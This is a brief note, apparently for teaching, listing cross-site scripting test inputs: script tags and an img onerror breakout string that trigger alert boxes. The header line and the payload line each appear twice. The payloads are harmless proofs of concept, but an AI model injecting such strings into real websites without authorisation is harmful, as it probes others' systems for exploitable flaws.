Some inputs to check for XSS issues
~~~
Some inputs to check for XSS issues, just for reference when I explain XSS and how it can be dangerous
<script>alert('XSS');</script>'"--><img src=x onerror=alert('XSS')>'><script>alert(0)</script>
Some inputs to check for XSS issues, just for reference when I explain XSS and how it can be dangerous
<script>alert('XSS');</script>'"--><img src=x onerror=alert('XSS')>'><script>alert(0)</script>